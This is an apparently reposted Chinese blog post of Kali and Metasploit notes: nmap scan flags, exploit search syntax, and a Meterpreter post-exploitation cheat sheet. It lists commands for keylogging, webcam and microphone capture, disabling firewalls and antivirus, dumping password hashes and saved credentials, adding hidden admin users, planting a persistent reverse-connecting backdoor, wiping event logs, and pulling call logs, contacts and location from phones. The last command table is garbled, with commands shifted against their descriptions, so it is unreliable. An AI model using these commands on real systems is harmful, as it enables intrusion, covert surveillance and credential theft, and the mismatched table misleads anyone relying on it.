zoukankan      html  css  js  c++  java
  • kali笔记

    扫描:
    nmap -Ss -Pn xxx.xxx.xxx.xxx

    -Ss:nmap的SYN扫描,属于TCP扫描的一种,但不建立完整的TCP连接,又称为半开放扫描。

    -sT:设置完整的TCP三次握手。

    -Pn:认为所有主机都在线,防止其他主机对本机进行ping屏蔽。

    查找exploit:
    search [参数:匹配]

    app:属于客户端或服务端攻击的模块

    author:属于哪位作者写的模块

    bid:匹配具有特定Bugtraq ID的模块

    cve:匹配特定cve ID的模块

    edb:匹配特定漏洞利用数据库ID的模块

    name:匹配特定名字的模块

    platform:匹配特定平台(Windows、Android、Linux)的模块

    ref:匹配具有ref的模块

    type:匹配特定类型的模块(exploit、auxiliary、post)

    例子:

    search cve:2009 type:exploit app:client

    系统信息:
    Ps //查看目标主机的进程信息

    Kill //杀掉某个进程

    Getuid //查看权限

    Pwd 查看当前目录路径(目标主机)

    Sysinfo //查看目标主机信息,比如版本信息等

    Shutdown //关机操作(谨慎操作)

    keyscan_start 打开纪录总体目标服务器的键盘输入

    keyscan_dump 輸出捕获到的总体目标键盘输入空格符信息内容

    keyscan_stop 终止键盘记录

    run vnc 打开实时监控界面

    webcam_stream 打开监控摄像头

    Webscan_list //查看摄像头列表;

    Webscan_stream //摄像头视频获取;

    Webscan_chat //查看摄像头接口;

    migrate 616 关掉另一方服务器防火墙

    screenshot 手机截图

    Run getgui -e //开启远程桌面;

    Run getgui -u cmdback -p 123123 //添加用户

    Run getgui -f 4446 -e //将目标主机上面的3389端口转发到4446

    netsh advfirewall set allprofiles state off //关闭防火墙

    Run post/windows/gather/checkvm //查看目标主机是否为虚机;

    run post/windows/gather/enum_applications //获取目标主机安装软件信息;

    Run post/windows/gather/enum_patches //查看目标主机的补丁信息;

    run post/windows/gather/enum_domain //查找目标主机域控。我本地没有域控;

    run post/windows/manage/killav //关闭杀毒软件;

    run post/windows/manage/enable_rdp //开启3389远程桌面;

    run post/windows/gather/enum_logged_on_users //列举当前登陆过主机的用户;

    run post/windows/gather/credentials/windows_autologin //抓取自动登陆的用户名和密码;

    run post/windows/manage/enable_rdp username=xxx password=xxx //添加远程桌面的用户(同时也会将该用户添加到管理员组)

    后门持久化:
    权限维持 :
    Persistence模块

    Run persistence -h //查看帮助信息;

    run persistence -U -i 5 -p 5555 -r 192.168.205.148

    -U:设置后门在用户登录后自启动。该方式会在HKCUSoftwareMicrosoftWindowsCurrentVersionRun下添加注册表信息。推荐使用该参数;

    -i:设置反向连接间隔时间,单位为秒;

    -p:设置反向连接的端口号;

    -r:设置反向连接的ip地址。

    痕迹清除 :
    clearev

     
    后渗透:
    查看进程
    ps    
    注入进程    
    migrate 
    查看远程桌面 
    查看文件            
    run vnc  
    编辑文件              
    cat
    上传文件                      
    edit   
    下载文件               
    upload  
    删除文件              
    download 
    创建文件夹               
    rm      
    删除文件夹                    
    mkdir
    查看会话                       
    rmdir
    退出当前会话                         
    sessions -l
    在线用户数               
    backgroud
    让键盘失效               
    enumdesktops
    恢复键盘                
    uictl disable keyboard
    音频录制     
    uictl enable keyboard
    开启摄像头    
    record_mic -d 10
    桌面抓图        
    webcam_stream
    系统信息查询          
    screenshot
    获取最高权限           
    sysinfo getsystem 
    密码hash             
    hashdump                             
    搜索
    search
    search -f *.jpg
    download
    打开前置或后置摄像头
    webcam_stream -i 1/2  
    检测root   
    check_root
    下载电话记录                  
    dump_calllog
    下载信息记录             
    dump_contacts
    定位,需要下载谷歌地图              
    geolocate 

  • 相关阅读:
    BOOST 信号与槽,获取槽函数返回值,使用占位参数传递信号携带的参数
    单例模式,reorder详解,线程安全,双检查锁
    编程源自生活:抽象 -> 生活中的洗头问题
    前置声明透彻理解,以及和直接头文件包含的区别,注意事项
    三种工厂模式详解
    个人作品1
    Python基本汇总问题
    Json字符串转换成Json对象
    html div可以进行编辑
    父页面访问iframe页面的js
  • 原文地址:https://www.cnblogs.com/yjxing/p/13386563.html
Copyright © 2011-2022 走看看